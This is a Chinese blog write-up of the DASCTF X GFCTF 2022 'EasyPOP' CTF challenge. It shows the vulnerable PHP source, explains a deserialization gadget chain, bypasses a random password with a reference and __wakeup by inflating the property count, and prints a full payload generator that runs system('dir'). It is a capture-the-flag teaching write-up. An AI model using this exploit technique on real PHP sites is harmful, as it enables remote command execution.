[DASCTF X GFCTF 2022十月挑战赛]EasyPOP

最新推荐文章于 2022-12-01 19:45:10 发布
最新推荐文章于 2022-12-01 19:45:10 发布
阅读量1.1k 收藏
点赞数
文章标签: web安全 网络安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yu3511606536/article/details/127591067
版权

[DASCTF X GFCTF 2022十月挑战赛]EasyPOP

考点:POP链构造

<?php
highlight_file(__FILE__);
error_reporting(0);

class fine
{
    private $cmd;
    private $content;

    public function __construct($cmd, $content)
    {
        $this->cmd = $cmd;
        $this->content = $content;
    }

    public function __invoke()
    {
        call_user_func($this->cmd, $this->content);
    }

    public function __wakeup()
    {
        $this->cmd = "";
        die("Go listen to Jay Chou's secret-code! Really nice");
    }
}

class show
{
    public $ctf;
    public $time = "Two and a half years";

    public function __construct($ctf)
    {
        $this->ctf = $ctf;
    }


    public function __toString()
    {
        return $this->ctf->show();
    }

    public function show(): string
    {
        return $this->ctf . ": Duration of practice: " . $this->time;
    }


}

class sorry
{
    private $name;
    private $password;
    public $hint = "hint is depend on you";
    public $key;

    public function __construct($name, $password)
    {
        $this->name = $name;
        $this->password = $password;
    }

    public function __sleep()
    {
        $this->hint = new secret_code();
    }

    public function __get($name)
    {
        $name = $this->key;
        $name();
    }


    public function __destruct()
    {
        if ($this->password == $this->name) {
            echo $this->hint;
        } else if ($this->name = "jay") {
            secret_code::secret();
        } else {
            echo "This is our code";
        }
    }


    public function getPassword()
    {
        return $this->password;
    }

    public function setPassword($password): void
    {
        $this->password = $password;
    }


}

class secret_code
{
    protected $code;

    public static function secret()
    {
        include_once "hint.php";
        hint();
    }

    public function __call($name, $arguments)
    {
        $num = $name;
        $this->$num();
    }

    private function show()
    {
        return $this->code->secret;
    }
}


if (isset($_GET['pop'])) {
    $a = unserialize($_GET['pop']);
    $a->setPassword(md5(mt_rand()));
} else {
    $a = new show("Ctfer");
    echo $a->show();
}

pop传参进行反序列化操作

构造POP链:

入口是sorry类中的__destruct方法,如果sorry类中的namepassword属性相等就会调用echo $this->hint操作,如果将hint赋值为show类即可调用它的__toString方法

但是源码中调用了

$a->setPassword(md5(mt_rand()));

这个操作,给password设置了一个随机md5加密值,使用取地址&方法绕过(类似于C语言中的取地址)

class sorry
{
    private $name;
    private $password;
    public function __construct()
    {
        $this->name = &$this->password;
        $this->password = 1;
    }
}

此时的链子已经到了show类中的__toString方法,

public function __toString()
{
    return $this->ctf->show();
}

将ctf属性赋值为secret_code类即可调用secret_code类的show方法

$secret_code = new secret_code($s2);
$show = new show();
$show->ctf = $secret_code;

show()方法

private function show()
{
    return $this->code->secret;
}

code赋值为sorry类即可调用sorry类中的__get方法

__get方法

public function __get($name)
{
    $name = $this->key;
    $name();
}

key属性赋值为fine类即可调用fine类中的__invoke方法

public function __invoke()
{
    call_user_func($this->cmd, $this->content);
}

链子到这结束。

完整的POP链

sorry::__destruct->show::__toString->secret_code::show->sorry::__get->fine::__invoke

在调用最后一步时,还需要绕过_wakeup

class fine
{
    private $cmd;
    private $content;

    public function __construct($cmd, $content)
    {
        $this->cmd = $cmd;
        $this->content = $content;
    }

    public function __invoke()
    {
        call_user_func($this->cmd, $this->content);
    }

    public function __wakeup()
    {
        $this->cmd = "";
        die("Go listen to Jay Chou's secret-code! Really nice");
    }
}

完整的Payload

<?php
class fine
{
    private $cmd;
    private $content;
    public function __construct($cmd, $content)
    {
        $this->cmd = $cmd;
        $this->content = $content;
    }
}

class secret_code
{
    protected $code;
    public function __construct($code)
    {
        $this->code = $code;
    }
}

class show
{
    public $ctf;
}

class sorry
{
    private $name;
    private $password;
    public function __construct()
    {
        $this->name = &$this->password;
        $this->password = 1;
    }
}
$s2 = new sorry();
$s2->key = new fine('system','dir');
$secret_code = new secret_code($s2);
$show = new show();
$show->ctf = $secret_code;
$sorry = new sorry();
$sorry->hint = $show;
$strs = str_replace("fine\":2","fine\":3", serialize($sorry));
echo urlencode($strs);
L1nYuan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网络安全提高篇] 一一〇.强网杯CTFWeb Write-Up(上) 寻宝、赌徒、EasyWeb、pop_master
杨秀璋的专栏
06-15 3万+
强网杯作为国内最好的CTF比赛之一,搞安全的博友和初学者都可以去尝试下。整体而言,比赛题目的水准仍然非常高,尤其是RE和PWN,包括Web,所以还是有很多知识点值得我们学习的。最后,非常感谢参考文献的大佬们,尤其是Nu1L战队(推荐VX关注他们),也感谢许多参加比赛的伙伴和博友们。如果您是一名安全初学者,不妨多参加比赛,每一次CTF比赛都能让我们学到很多东西,即使是赛后的WP,也能成长不少。同时有个遗憾,比赛完后题目不能打开复现,将就看吧。
DASCTF X GFCTF 2022十月挑战赛-web复现wp
m0_53567065的博客
11-02 1014
1.找魔术方法(因为我初学记不住),出口函数和入口函数接下来写exp这里注意一下要绕过fine 类的 __wakeup,将属性个数改成大于实际个数就行。看了个师傅的wp,知道了感觉比较方便的写法,就是写__construct()构造函数。
HITCTF2022-WEB2-easypop
最新发布
weixin_43610673的博客
12-01 659
f::ev1l 函数那的判断用浮点数精度绕过。还有一段正则过滤要处理。
CTF新生杯PHP反序列化题——ezpop
白给、少年
02-26 914
题目源码: <?php error_reporting(0); class openfunc{ public $object; function __construct(){ $this->object=new normal(); } function __wakeup(){ $this->object=new normal(); } function __destruct(){ $this
DASCTF2022 ——十月Web 部分Writeup
渗透测试研究中心
10-28 1470
EasyPOP题目环境是 php 7.4, 图省事直接把所有属性的类型都改成 public起点是 sorry 类的__destruct(), 由echo $this->hint调用到 show 类的__toString()方法, 然后通过执行$this->ctf->show()跳转 secret_code 类的__call(), 进而到show()方法, ...
DASCTF X GFCTF 2022十月挑战赛 WriteUp
Whitebird的博客
10-24 3640
DASCTF X GFCTF 2022十月挑战赛 WriteUp
EasyPDP An Efficient Parallel Dynamic
12-11
有关简易弹出的新型运算时论文。题目:唐等人:简单弹出:一种针对计算生物学的有效并行动态编程并行时系统
flutter_easy_popup:一种简单的显示自定义弹出窗口小部件的方法
05-20
flutter_easy_popup 显示浮动自定义弹出窗口小部件的一种简单方法。 截屏 例子 截屏 例子 您可以通过以下命令运行示例。 cd ./example flutter create . ...使用EasyPopupChild定义您的自定义弹出窗口小部件,并实现...
NUAACTF-2020 web 解题思路分享
qq_42851946的博客
06-01 4543
是阳间题 感谢喵师傅的环境,膜:https://miaotony.xyz/2020/05/30/CTF_2020NUAACTF/ web1-checkin ctrl+u的,没注意到在下面,后来在返回包的html里才看见。。。 nuaactf{we1cOme_to_NuaAcTF} web2-jwt 关于jwt和jwt伪造,膜:https://blog.csdn.net/qq_45521281/article/details/106073624 github上有一个爆破jwt-secret的工具,膜:htt
[MRCTF2020]Ezpop_Revenge
qq_45691294的博客
10-17 1383
题目打开是个typecho博客,www.zip泄露,下载得到源码 看到flag.php可能是一个SSRF的题 <?php if(!isset($_SESSION)) session_start(); if($_SERVER['REMOTE_ADDR']==="127.0.0.1"){ $_SESSION['flag']= "MRCTF{******}"; }else echo "我扌your problem?\nonly localhost can get flag!"; ?> 因为是一
ctf练习之Easy upload
SDM_JH的博客
08-07 2585
一、进入目标站点,查看网页源码,发现上传后缀白名单。 二、先上传一个.png的图片看看,得到提示。 三、打开burp suite,设置代理。修改上传的文件名,绕过前端限制,得到新的提示。 四、在图片内容的中间位置插入内容,得到flag ...
DASCTF Sept X 浙江工业大学秋季挑战赛 web
weixin_43610673的博客
09-26 837
hellounser <?php class A { public $var; public function show(){ echo $this->var; } public function __invoke(){ $this->show(); } } class B{ public $func; public $arg; public function __toString(
CTFSHOW 击剑杯
qq_51584770的博客
11-18 696
给我看看 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); require_once("flag.php"); class whoami{ public $name; public $your_answer; public $useless; public function __construct(){ $this->name='ctfshow第
CTF RSA入门及ctfshow easyrsa1-8 WP
mumuzi的博客
02-27 9550
RSA入门
[CTFSHOW]CTFSHOW-其他WP
Y4tacker的博客
02-10 2691
文章目录说在前面Web396(下面其实有通杀的但是得多试试其他的)Web397-Web401Web402We4b03Web404web405Web406Web407Web408Web409web410web411web412web413web414web415web416Web417web418web419web420web421-422web423web424-web431web432web433web434web435-436web437-438web439-440web441web442web443w
CTFshow 击剑杯 部分WP
Nancy523的博客
11-13 4370
摆烂了摆烂了 太难了 聪明的师傅已经组队打起月赛了 试试能不能苟住前5 苟住了 复现的后面再补充吧 文章目录1.Misc中文识别带师2.Web简单的验证码easyPOP3.Pwnpwn01-My_sword_is_readypwn02-Precision_and_grace4.Osint英语阅读这是哪里卡鲁铁盒人家想玩嘛人有点多小城美食安装arph5.热身听歌识曲看图识妹进群得码 1.Misc 麻麻的 只会一题 其他的等复现再补充吧 中文识别带师 挺好玩一个题 格局打开 linux nc进环境(注意进
MRCTF2020 web Ezpop_Revenge 简单记录
a3320315的博客
03-31 3000
题目介绍 首先这是一个typecho的框架 然后通过扫目录得到www.zip源码泄露,然后就是审计代码了~~ 解题过程 首先我们找到输入点 在插件中,我们发现action()的代码 这儿需要说明一下,这儿的action一般是自动加载的,当路由加载类是会自动加载某个函数,所以我们直接搜索这个类得名称~~ Helper::addRoute("page_admin_action","/page_a...
【Writeup】i春秋 Linux Pwn 入门教程_EasyCTF 2017-doubly_dangerous
BAKUMANSEC - Just Do It
08-20 785
Linux pwn入门教程(1)——栈溢出基础 0x01 解题思路 查看文件信息并试运行 ​ 开启了NX,栈上无法执行代码。 拖入IDA 32bits,F5查看 ​ main 显然存在栈溢出漏洞,目前存在两种思路: 覆盖RIP为give_flag地址,执行give_flag函数 覆盖v5的值为11.28125,使其通过判断执行give_flag函数 通过尝试发现,按...
ctf内存取证----easy_dump
MOLLMY的专栏
09-15 2951
前一段时间又做了去年护网杯的内存取证题 第一次不参考任何wp提示,自己做,没想到做得挺顺利 Easy_dump writeup 解题步骤 Step 1 Volatility imageinfo 得知系统为Win7SP1x64 Setp 2 查看进程列表 查看命令行历史 没有什么发现 Step 3 执行netscan、iehisto...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值